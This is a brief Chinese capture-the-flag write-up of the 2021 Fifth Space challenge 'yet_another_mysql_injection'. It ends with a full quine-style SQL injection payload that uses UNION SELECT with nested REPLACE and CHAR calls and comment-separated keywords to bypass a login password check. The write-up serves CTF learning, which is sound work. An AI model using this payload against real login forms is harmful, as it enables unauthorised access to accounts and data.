[第五空间 2021]yet_another_mysql_injection

随便输入进去，发现只有账号是admin可以进入

使用弱密码admin admin，报错为hacker

就没啥办法了，想着F12看一下源码

发现有一个source，打开看看

可以发现username是固定的admin,password需要直接手动输入

这时就不知道咋整了，上网搜了一下

username=admin&password='UNION/**/SELECT/**/REPLACE(REPLACE('"UNION/**/SELECT/**/REPLACE(REPLACE("?",CHAR(34),CHAR(39)),CHAR(63),"?")/**/AS/**/a#',CHAR(34),CHAR(39)),CHAR(63),'"UNION/**/SELECT/**/REPLACE(REPLACE("?",CHAR(34),CHAR(39)),CHAR(63),"?")/**/AS/**/a#')/**/AS/**/a#